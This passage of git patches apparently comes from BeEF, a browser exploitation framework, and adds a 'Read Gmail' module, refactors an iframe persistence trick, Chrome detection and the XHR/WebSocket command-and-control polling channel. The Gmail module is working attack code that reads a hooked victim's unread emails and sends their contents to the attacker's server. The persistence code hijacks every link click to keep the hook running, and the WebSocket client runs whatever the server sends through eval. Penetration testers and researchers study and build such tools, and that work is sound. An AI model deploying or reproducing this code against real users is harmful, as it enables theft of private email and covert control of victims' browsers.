 3 files changed, 97 insertions(+)
 create mode 100644 modules/misc/read_gmail/command.js
 create mode 100644 modules/misc/read_gmail/config.yaml
 create mode 100644 modules/misc/read_gmail/module.rb

diff --git a/modules/misc/read_gmail/command.js b/modules/misc/read_gmail/command.js
new file mode 100644
index 000000000..b6276b213
--- /dev/null
+++ b/modules/misc/read_gmail/command.js
@@ -0,0 +1,46 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+	var result; 
+
+	try { 
+		x = new XMLHttpRequest();
+		x.open('get', 'https://mail.google.com/mail/feed/atom', false);
+		x.send();
+
+		str = x.responseText; var re = /message_id=([A-Z,a-z,0-9]*)/g;
+		var match;
+		while(match = re.exec(str)) {
+		    console.log(match[1])
+			x = new XMLHttpRequest();
+			x.open('get', 'https://mail.google.com/mail/u/0/h/?&v=om&th='+match[1]+'&f=1&f=1', false);
+			x.send();
+			result += x.responseText;
+		}
+  	
+	} catch(e) { 
+		for(var n in e) 
+			result+= n + " " + e[n] + "\n"; 
+	} 
+	console.log('sending');
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result);
+});
+
+
+
+
+
+ 
diff --git a/modules/misc/read_gmail/config.yaml b/modules/misc/read_gmail/config.yaml
new file mode 100644
index 000000000..2b0baefbf
--- /dev/null
+++ b/modules/misc/read_gmail/config.yaml
@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        read_gmail:
+            enable: true
+            category: "Misc"
+            name: "Read Gmail"
+            description: "If we are able to run in the context of mail.google.com (either by SOP bypass or other issue) then lets go read some email, grabs unread message ids from gmails atom feed, then grabs conent of each message"
+            authors: ["mh"]
+            target:
+                user_notify: ['ALL']
diff --git a/modules/misc/read_gmail/module.rb b/modules/misc/read_gmail/module.rb
new file mode 100644
index 000000000..d0ec4d52c
--- /dev/null
+++ b/modules/misc/read_gmail/module.rb
@@ -0,0 +1,26 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Read_gmail < BeEF::Core::Command
+  
+  #
+  # This method is being called when a zombie sends some
+  # data back to the framework.
+  #
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end

From c2185d2cec856e67417795a83db54603b64068c8 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 21 Nov 2012 05:10:52 +0000
Subject: [PATCH 103/397] Refactoring session.js moving the iframe persistence
 technique in dom.js. Updated iframe_above to use the new component.

---
 core/main/client/beef.js                    |  4 +---
 core/main/client/dom.js                     | 19 +++++++++++++++++++
 core/main/client/session.js                 | 19 -------------------
 modules/persistence/iframe_above/command.js |  2 +-
 4 files changed, 21 insertions(+), 23 deletions(-)

diff --git a/core/main/client/beef.js b/core/main/client/beef.js
index 916097331..41fab94a9 100644
--- a/core/main/client/beef.js
+++ b/core/main/client/beef.js
@@ -6,13 +6,11 @@
 
 /*!
  * BeEF JS Library <%= @beef_version %>
- * http://beef.googlecode.com/
+ * Register the BeEF JS on the window object.
  */
 
 $j = jQuery.noConflict();
 
-//<%= @beef_hook_session_name %>='<%= @beef_hook_session_id %>';
-
 if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 	
 	var BeefJS = {
diff --git a/core/main/client/dom.js b/core/main/client/dom.js
index 20e086549..bcebc904d 100644
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -108,6 +108,25 @@ beef.dom = {
 		}
 		return iframe;
 	},
+
+    /**
+     * Load the link (href value) in an overlay foreground iFrame.
+     * The BeEF hook continues to run in background.
+     * NOTE: if the target link is returning X-Frame-Options deny/same-origin or uses
+     * Framebusting techniques, this will not work.
+     */
+    persistentIframe: function(){
+        $j('a').click(function(e) {
+            if ($j(this).attr('href') != '')
+            {
+                e.preventDefault();
+                beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+                $j(document).attr('title', $j(this).html());
+                document.body.scroll = "no";
+                document.documentElement.style.overflow = 'hidden';
+            }
+        });
+    },
 	
 	/**
      * Create a form element with the specified parameters, appending it to the DOM if append == true
diff --git a/core/main/client/session.js b/core/main/client/session.js
index 7d32e250b..8dc4e6a8d 100644
--- a/core/main/client/session.js
+++ b/core/main/client/session.js
@@ -68,26 +68,7 @@ beef.session = {
 		}
 		
 		return hook_session_id;
-	},
-
-	/**
-	 * Overrides each link, and creates an iframe (loading the href) instead of following the link
-	 */
-	persistent: function() {
-		$j('a').click(function(e) {
-			if ($j(this).attr('href') != '')
-			{
-				e.preventDefault();
-				beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
-				$j(document).attr('title', $j(this).html());
-				document.body.scroll = "no";
-				document.documentElement.style.overflow = 'hidden';
-			}
-		});
 	}
-	
-
-				
 };
 
 beef.regCmp('beef.session');
diff --git a/modules/persistence/iframe_above/command.js b/modules/persistence/iframe_above/command.js
index 7f1f5cea7..db8185d5f 100644
--- a/modules/persistence/iframe_above/command.js
+++ b/modules/persistence/iframe_above/command.js
@@ -5,6 +5,6 @@
 //
 
 beef.execute(function() {
-	beef.session.persistent();
+    beef.dom.persistentIframe();
 	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Links have been rewritten to spawn an iFrame.');
 });

From 2ae03736aba6a2cbdb3cae12161a922266224355 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 21 Nov 2012 05:19:47 +0000
Subject: [PATCH 104/397] Added Chrome 23 detection. Refactored the
 hasWebSockets method.

---
 core/main/client/browser.js | 17 +++++++++++++----
 1 file changed, 13 insertions(+), 4 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index c161bb6ea..16ef18b73 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -389,12 +389,20 @@ beef.browser = {
 		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==22)?true:false);
 	},
 
+    /**
+     * Returns true if Chrome 23.
+     * @example: beef.browser.isC23()
+     */
+    isC23: function() {
+        return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==23)?true:false);
+    },
+
 	/**
 	 * Returns true if Chrome.
 	 * @example: beef.browser.isC()
 	 */
 	isC: function() {
-		return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22();
+		return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23();
 	},
 
 	/**
@@ -472,6 +480,7 @@ beef.browser = {
 			C20:	this.isC20(),	// Chrome 20
 			C21:	this.isC21(),	// Chrome 21
 			C22:	this.isC22(),	// Chrome 22
+            C23:	this.isC23(),	// Chrome 23
 			C:	this.isC(), 	// Chrome any version
 
 			FF2:	this.isFF2(),	// Firefox 2
@@ -540,8 +549,9 @@ beef.browser = {
 		if (this.isC20())	{ return '20' };	// Chrome 20
 		if (this.isC21())	{ return '21' };	// Chrome 21
 		if (this.isC22())   { return '22' };    // Chrome 22
+        if (this.isC23())   { return '23' };    // Chrome 23
 
-		if (this.isFF2())	{ return '2'  };	// Firefox 2
+        if (this.isFF2())	{ return '2'  };	// Firefox 2
 		if (this.isFF3())	{ return '3'  };	// Firefox 3
 		if (this.isFF3_5())	{ return '3.5'};	// Firefox 3.5
 		if (this.isFF3_6())	{ return '3.6'};	// Firefox 3.6
@@ -697,7 +707,6 @@ beef.browser = {
 		} catch(e) {
 			return false;
 		}
-		return false;
 	},
 	
 	/**
@@ -965,7 +974,7 @@ beef.browser = {
 	 * In FF6+ the websocket object has been prefixed with Moz, so now it's called MozWebSocket
 	 * */
 	hasWebSocket: function() {
-		if (!!window.WebSocket || !!window.MozWebSocket) return true; else return false;
+		return !!window.WebSocket || !!window.MozWebSocket;
 	},
 
 	/**

From 03f7f888b5f5506aff29946a4c2a6c2754d32362 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 21 Nov 2012 06:13:32 +0000
Subject: [PATCH 105/397] Documented (JSdoc) all the init.js methods.

---
 core/main/client/init.js | 26 +++++++++++++++++---------
 1 file changed, 17 insertions(+), 9 deletions(-)

diff --git a/core/main/client/init.js b/core/main/client/init.js
index f3ada7298..2e87606a9 100644
--- a/core/main/client/init.js
+++ b/core/main/client/init.js
@@ -4,11 +4,15 @@
 // See the file 'doc/COPYING' for copying permission
 //
 
-
-// if beef.pageIsLoaded is true, then this JS has been loaded >1 times 
-// and will have a new session id. The new session id will need to know
-// the brwoser details. So sendback the browser details again.
-
+/**
+ * @literal object: beef.init
+ * Contains the beef_init() method which starts the BeEF client-side
+ * logic. Also, it overrides the 'onpopstate' and 'onclose' events on the windows object.
+ *
+ * If beef.pageIsLoaded is true, then this JS has been loaded >1 times
+ * and will have a new session id. The new session id will need to know
+ * the brwoser details. So sendback the browser details again.
+ */
 BEEFHOOK = beef.session.get_hook_session_id();
 
 if (beef.pageIsLoaded) {
@@ -49,6 +53,13 @@ window.onclose = function (event) {
     }
 };
 
+/**
+ * Starts the polling mechanism, and initialize various components:
+ *  - browser details (see browser.js) are sent back to the "/init" handler
+ *  - the polling starts (checks for new commands, and execute them)
+ *  - the logger component is initialized (see logger.js)
+ *  - the Autorun Engine is initialized (see are.js)
+ */
 function beef_init() {
     if (!beef.pageIsLoaded) {
         beef.pageIsLoaded = true;
@@ -58,15 +69,12 @@ function beef_init() {
             beef.updater.execute_commands();
             beef.logger.start();
             beef.are.init();
-
-        }
-        else {
+        }else {
             beef.net.browser_details();
             beef.updater.execute_commands();
             beef.updater.check();
             beef.logger.start();
             beef.are.init();
         }
-
     }
 }

From 72a4a127fff7c91452571fb2122578c77069e769 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 21 Nov 2012 06:14:59 +0000
Subject: [PATCH 106/397] Documented (JSdoc) all the net.js methods.

---
 core/main/client/net.js | 98 +++++++++++++++++++++++++++++++----------
 1 file changed, 75 insertions(+), 23 deletions(-)

diff --git a/core/main/client/net.js b/core/main/client/net.js
index 90cb284b6..62c98a8ac 100644
--- a/core/main/client/net.js
+++ b/core/main/client/net.js
@@ -7,7 +7,14 @@
 /*!
  * @literal object: beef.net
  *
- * Provides basic networking functions.
+ * Provides basic networking functions,
+ * like beef.net.request and beef.net.forgeRequest,
+ * used by BeEF command modules and the Requester extension,
+ * as well as beef.net.send which is used to return commands
+ * to BeEF server-side components.
+ *
+ * Also, it contains the core methods used by the XHR-polling
+ * mechanism (flush, queue)
  */
 beef.net = {
 
@@ -21,7 +28,10 @@ beef.net = {
     sid_count:0,
     cmd_queue:[],
 
-    //Command object
+    /**
+     * Command object. This represents the data to be sent back to BeEF,
+     * using the beef.net.send() method.
+     */
     command:function () {
         this.cid = null;
         this.results = null;
@@ -29,13 +39,17 @@ beef.net = {
         this.callback = null;
     },
 
-    //Packet object
+    /**
+     * Packet object. A single chunk of data. X packets -> 1 stream
+     */
     packet:function () {
         this.id = null;
         this.data = null;
     },
 
-    //Stream object
+    /**
+     * Stream object. Contains X packets, which are command result chunks.
+     */
     stream:function () {
         this.id = null;
         this.packets = [];
@@ -51,7 +65,8 @@ beef.net = {
 
     /**
      * Response Object - used in the beef.net.request callback
-     * Note: as we are using async mode, the response object will be empty if returned.Using sync mode, request obj fields will be populated.
+     * NOTE: as we are using async mode, the response object will be empty if returned.
+     * Using sync mode, request obj fields will be populated.
      */
     response:function () {
         this.status_code = null;        // 500, 404, 200, 302
@@ -64,7 +79,13 @@ beef.net = {
         this.headers = null;            // full response headers
     },
 
-    //Queues the command, to be sent back to the framework on the next refresh
+    /**
+     * Queues the specified command results.
+     * @param: {String} handler: the server-side handler that will be called
+     * @param: {Integer} cid: command id
+     * @param: {String} results: the data to send
+     * @param: {Function} callback: the function to call after execution
+     */
     queue:function (handler, cid, results, callback) {
         if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
             var s = new beef.net.command();
@@ -76,8 +97,16 @@ beef.net = {
         }
     },
 
-    // Queues the current command and flushes the queue straight away.
-    // Always send Browser Fingerprinting results (beef.net.browser_details(); -> /init handler) using normal XHR-polling.
+    /**
+     * Queues the current command results and flushes the queue straight away.
+     * NOTE: Always send Browser Fingerprinting results
+     * (beef.net.browser_details(); -> /init handler) using normal XHR-polling,
+     * even if WebSockets are enabled.
+     * @param: {String} handler: the server-side handler that will be called
+     * @param: {Integer} cid: command id
+     * @param: {String} results: the data to send
+     * @param: {Function} callback: the function to call after execution
+     */
     send:function (handler, cid, results, callback) {
         if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
             this.queue(handler, cid, results, callback);
@@ -94,7 +123,14 @@ beef.net = {
         }
     },
 
-    //Flush all currently queued commands to the framework
+    /**
+     * Flush all currently queued command results to the framework,
+     * chopping the data in chunks ('chunk' method) which will be re-assembled
+     * server-side by the network stack.
+     * NOTE: currently 'flush' is used only with the default
+     * XHR-polling mechanism. If WebSockets are used, the data is sent
+     * back to BeEF straight away.
+     */
     flush:function () {
         if (this.cmd_queue.length > 0) {
             var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
@@ -118,13 +154,21 @@ beef.net = {
         }
     },
 
-    //Split string into chunk lengths determined by amount
+    /**
+     * Split the input data into chunk lengths determined by the amount parameter.
+     * @param: {String} str: the input data
+     * @param: {Integer} amount: chunk length
+     */
     chunk:function (str, amount) {
         if (typeof amount == 'undefined') n = 2;
         return str.match(RegExp('.{1,' + amount + '}', 'g'));
     },
 
-    //Push packets to framework
+    /**
+     * Push the input stream back to the BeEF server-side components.
+     * It uses beef.net.request to send back the data.
+     * @param: {Object} stream: the stream object to be sent back.
+     */
     push:function (stream) {
         //need to implement wait feature here eventually
         for (var i = 0; i < stream.pc; i++) {
@@ -133,7 +177,7 @@ beef.net = {
     },
 
     /**
-     *Performs http requests
+     * Performs http requests
      * @param: {String} scheme: HTTP or HTTPS
      * @param: {String} method: GET or POST
      * @param: {String} domain: bindshell.net, 192.168.3.4, etc
@@ -192,13 +236,12 @@ beef.net = {
             data:data,
             timeout:(timeout * 1000),
 
-            //needed otherwise jQuery always add Content-type: application/xml, even if data is populated
+            //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
             beforeSend:function (xhr) {
                 if (method == "POST") {
                     xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
                 }
             },
-
             success:function (data, textStatus, xhr) {
                 var end_time = new Date().getTime();
                 response.status_code = xhr.status;
@@ -239,9 +282,11 @@ beef.net = {
     },
 
     /*
-     * Similar to this.request, except from a few things that are needed when dealing with forged requests:
+     * Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
      *  - requestid: needed on the callback
      *  - allowCrossDomain: set cross-domain requests as allowed or blocked
+     *
+     * forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
      */
     forge_request:function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
 
@@ -284,14 +329,21 @@ beef.net = {
             return response;
         }
 
-        // build and execute the request
-        if (method == "POST") {
+        /*
+         * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
+         * This will turn POSTs into GETs for remote-domain requests.
+         */
+        if (method == "POST"){
             $j.ajaxSetup({
-                data:data
+                dataType: dataType
+            });
+        } else {
+            $j.ajaxSetup({
+                dataType: 'script'
             });
         }
 
-		// this is required for bugs in IE so data can be transfered back to the server
+		// this is required for bugs in IE so data can be transferred back to the server
         if ( beef.browser.isIE() ) {
             dataType = 'script'
         }
@@ -302,9 +354,7 @@ beef.net = {
             headers: headers,
             timeout: (timeout * 1000),
 
-            // needed otherwise jQuery always adds:
-            // Content-type: application/xml
-            // even if data is populated
+            //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
             beforeSend:function (xhr) {
                 if (method == "POST") {
                     xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
@@ -406,7 +456,9 @@ beef.net = {
         return false;
     },
 
-    //Sends back browser details to framework
+    /**
+     * Sends back browser details to framework, calling beef.browser.getDetails()
+     */
     browser_details:function () {
         var details = beef.browser.getDetails();
         details['HookSessionID'] = beef.session.get_hook_session_id();

From 011bb0e94b1924bdf85d8997026f1a1178f779c2 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 21 Nov 2012 06:26:15 +0000
Subject: [PATCH 107/397] Refactored WebSocket polling timeout config value.

---
 config.yaml                          | 2 +-
 core/main/client/websocket.js        | 4 ++--
 core/main/handlers/modules/beefjs.rb | 2 +-
 3 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/config.yaml b/config.yaml
index 29d68f633..585d0ef9a 100644
--- a/config.yaml
+++ b/config.yaml
@@ -35,7 +35,7 @@ beef:
           secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
           port: 61985 # WS: good success rate through proxies
           secure_port: 61986 # WSS
-          alive_timer: 1000 # poll BeEF every second
+          ws_poll_timeout: 1000 # poll BeEF every second
 
         # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
         web_server_imitation:
diff --git a/core/main/client/websocket.js b/core/main/client/websocket.js
index 2b5edcab4..74754db6f 100644
--- a/core/main/client/websocket.js
+++ b/core/main/client/websocket.js
@@ -11,7 +11,7 @@
 beef.websocket = {
 
     socket:null,
-    alive_timer:<%= @websocket_timer %>,
+    ws_poll_timeout:<%= @ws_poll_timeout %>,
 
     init:function () {
         var webSocketServer = beef.net.host;
@@ -69,7 +69,7 @@ beef.websocket = {
     alive: function (){
         beef.websocket.send('{"alive":"'+beef.session.get_hook_session_id()+'"}');
 //        console.log("sent alive");
-        setTimeout("beef.websocket.alive()", beef.websocket.alive_timer);
+        setTimeout("beef.websocket.alive()", beef.websocket.ws_poll_timeout);
 
     }
 };
diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index d3b87672d..23fca1321 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -84,7 +84,7 @@ module BeEF
             if config.get("beef.http.websocket.enable")
               hook_session_config['websocket_secure'] = config.get("beef.http.websocket.secure")
               hook_session_config['websocket_port'] = config.get("beef.http.websocket.port")
-              hook_session_config['websocket_timer'] = config.get("beef.http.websocket.alive_timer")
+              hook_session_config['ws_poll_timeout'] = config.get("beef.http.websocket.ws_poll_timeout")
               hook_session_config['websocket_sec_port']= config.get("beef.http.websocket.secure_port")
             end
 

From 4b6130a315217ba23ba4277b048e757ab87afa61 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 21 Nov 2012 06:37:41 +0000
Subject: [PATCH 108/397] Added xhr_poll_timeout config to the main
 config.yaml. This can now be used to decrease/increase polling timeout for
 the normal XHR-polling communication.

---
 config.yaml                          |  6 +++++-
 core/main/client/updater.js          | 10 ++++------
 core/main/handlers/modules/beefjs.rb |  3 +++
 3 files changed, 12 insertions(+), 7 deletions(-)

diff --git a/config.yaml b/config.yaml
index 585d0ef9a..b30b4b245 100644
--- a/config.yaml
+++ b/config.yaml
@@ -20,6 +20,10 @@ beef:
         debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
         host: "0.0.0.0"
         port: "3000"
+        # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
+        # It's not advised to decrease it with tons of hooked browsers (more than 50),
+        # because it might impact performance. Also, enable WebSockets is generally better.
+        xhr_poll_timeout: 5000
         # if running behind a nat set the public ip address here
         #public: ""
         #public_port: "" # port setting is experimental
@@ -34,7 +38,7 @@ beef:
           enable: false
           secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
           port: 61985 # WS: good success rate through proxies
-          secure_port: 61986 # WSS
+          secure_port: 61986 # WSSecure
           ws_poll_timeout: 1000 # poll BeEF every second
 
         # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
diff --git a/core/main/client/updater.js b/core/main/client/updater.js
index 5ac56823e..5af863d0f 100644
--- a/core/main/client/updater.js
+++ b/core/main/client/updater.js
@@ -14,7 +14,7 @@ beef.updater = {
 	// Low timeouts combined with the way the framework sends commamd modules result 
 	// in instructions being sent repeatedly or complex code. 
 	// If you suffer from ADHD, you can decrease this setting.
-	timeout: 5000,
+    xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
 	
 	// A lock.
 	lock: false,
@@ -42,22 +42,20 @@ beef.updater = {
 			beef.net.flush();
 			if(beef.commands.length > 0) {
 				this.execute_commands();
-			}
-
-            else {
+			}else {
 				this.get_commands();    /*Polling*/
 			}
 		}
 
       // ( typeof beef.websocket === "undefined")
-		setTimeout("beef.updater.check();", beef.updater.timeout);
+		setTimeout("beef.updater.check();", beef.updater.xhr_poll_timeout);
 	},
 	
 	// Gets new commands from the framework.
 	get_commands: function(http_response) {
 		try {
 			this.lock = true;
-            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 1, 'script', function(response) {
+            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
                 if (response.body != null && response.body.length > 0)
                     beef.updater.execute_commands();
             });
diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index 23fca1321..41b5ac719 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -69,6 +69,9 @@ module BeEF
               hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host)
             end
 
+            # @note set the XHR-polling timeout
+            hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
+
             # @note if http_port <> public_port in config ini, use the public_port
             unless hook_session_config['beef_public_port'].nil?
               if hook_session_config['beef_port'] != hook_session_config['beef_public_port']

From 328df7af9759c5da5e1f54177681ef866ad3cab2 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Wed, 21 Nov 2012 07:12:56 +0000
Subject: [PATCH 109/397] Documented (JSdoc) both updater.js and websocket.js.
 Finally :D

---
 core/main/client/updater.js   | 20 ++++-----
 core/main/client/websocket.js | 82 ++++++++++++++++++++---------------
 2 files changed, 58 insertions(+), 44 deletions(-)

diff --git a/core/main/client/updater.js b/core/main/client/updater.js
index 5af863d0f..912e64b16 100644
--- a/core/main/client/updater.js
+++ b/core/main/client/updater.js
@@ -8,12 +8,12 @@
  * @Literal object: beef.updater
  *
  * Object in charge of getting new commands from the BeEF framework and execute them.
+ * The XHR-polling channel is managed here. If WebSockets are enabled,
+ * websocket.ls is used instead.
  */
 beef.updater = {
 	
-	// Low timeouts combined with the way the framework sends commamd modules result 
-	// in instructions being sent repeatedly or complex code. 
-	// If you suffer from ADHD, you can decrease this setting.
+	// XHR-polling timeout.
     xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
 	
 	// A lock.
@@ -51,8 +51,10 @@ beef.updater = {
 		setTimeout("beef.updater.check();", beef.updater.xhr_poll_timeout);
 	},
 	
-	// Gets new commands from the framework.
-	get_commands: function(http_response) {
+    /**
+     * Gets new commands from the framework.
+     */
+	get_commands: function() {
 		try {
 			this.lock = true;
             beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
@@ -66,13 +68,12 @@ beef.updater = {
 		this.lock = false;
 	},
 	
-	// Executes the received commands if any.
+    /**
+     * Executes the received commands, if any.
+     */
 	execute_commands: function() {
 		if(beef.commands.length == 0) return;
-		
 		this.lock = true;
-		/*here execute the command */
-
 		while(beef.commands.length > 0) {
 			command = beef.commands.pop();
 			try {
@@ -81,7 +82,6 @@ beef.updater = {
 				console.error('execute_commands - command failed to execute: ' + e.message);
 			}
 		}
-		
 		this.lock = false;
 	}
 };
diff --git a/core/main/client/websocket.js b/core/main/client/websocket.js
index 74754db6f..796980990 100644
--- a/core/main/client/websocket.js
+++ b/core/main/client/websocket.js
@@ -5,72 +5,86 @@
 //
 
 
-//beef.websocket.socket.send(take answer to server beef)
-/*New browser init call this */
+/**
+ * @Literal object: beef.websocket
+ *
+ * Manage the WebSocket communication channel.
+ * This channel is much faster and responsive, and it's used automatically
+ * if the browser supports WebSockets AND beef.http.websocket.enable = true.
+ */
 
 beef.websocket = {
 
     socket:null,
-    ws_poll_timeout:<%= @ws_poll_timeout %>,
+    ws_poll_timeout: "<%= @ws_poll_timeout %>",
 
+    /**
+     * Initialize the WebSocket client object.
+     * Note: use WebSocketSecure only if the hooked domain is under https.
+     * Mixed-content in WS is quite different from a non-WS context.
+     */
     init:function () {
         var webSocketServer = beef.net.host;
-        var webSocketPort = <%= @websocket_port %>;
-        var webSocketSecure = <%= @websocket_secure %>;
+        var webSocketPort = "<%= @websocket_port %>";
+        var webSocketSecure = "<%= @websocket_secure %>";
         var protocol = "ws://";
-        //console.log("We are inside init");
-        /*use wss only if hooked domain is under https. Mixed-content in WS is quite different from a non-WS context*/
+
         if(webSocketSecure && window.location.protocol=="https:"){
             protocol = "wss://";
-        webSocketPort= <%= @websocket_sec_port %>;
+            webSocketPort= "<%= @websocket_sec_port %>";
         }
 
-    if (beef.browser.isFF() && !!window.MozWebSocket) {
-        beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
-
-        } else {
-        beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
+        if (beef.browser.isFF() && !!window.MozWebSocket) {
+            beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
+        }else{
+            beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
         }
 
     },
-    /* send Helo message to the BeEF server and start async communication*/
+
+    /**
+     * Send Helo message to the BeEF server and start async polling.
+     */
     start:function () {
         new beef.websocket.init();
         this.socket.onopen = function () {
-        //console.log("Socket has been opened!");
-
-        /*send browser id*/
-        beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
-            //console.log("Connected and Helo");
+            beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
             beef.websocket.alive();
-        }
+        };
+
         this.socket.onmessage = function (message) {
-            //console.log("Received message via WS."+ message.data);
+            //todo: double-check if there is a way to don't use eval here. It's not a big deal,
+            //todo: because the eval'ed data comes from BeEF itself, so is implicitly trusted.
             eval(message.data);
-        }
+        };
 
         this.socket.onclose = function () {
-        setTimeout(function(){beef.websocket.start()}, 5000);
-        }
-
+            setTimeout(function(){beef.websocket.start()}, 5000);
+        };
     },
 
+    /**
+     * Send data back to BeEF. This is basically the same as beef.net.send,
+     * but doesn't queue commands.
+     * Example usage:
+     * beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
+     * '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
+     * '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
+     */
     send:function (data) {
         try {
-        this.socket.send(data);
-        //console.log("Sent [" + data + "]");
-         }
-         catch(err){
-         //console.log(err);
-
-         }
+            this.socket.send(data);
+        }catch(err){}
     },
 
+    /**
+     * Polling mechanism, to notify the BeEF server that the browser is still hooked,
+     * and the WebSocket channel still alive.
+     * todo: there is probably a more efficient way to do this. Double-check WebSocket API.
+     */
     alive: function (){
         beef.websocket.send('{"alive":"'+beef.session.get_hook_session_id()+'"}');
-//        console.log("sent alive");
         setTimeout("beef.websocket.alive()", beef.websocket.ws_poll_timeout);
-
     }
 };
 

From efec8b9bc326385943560e1389a68ec46a859e7a Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Thu, 22 Nov 2012 14:26:12 +0000
Subject: [PATCH 110/397] Clarified with code comments (main config.yaml) how
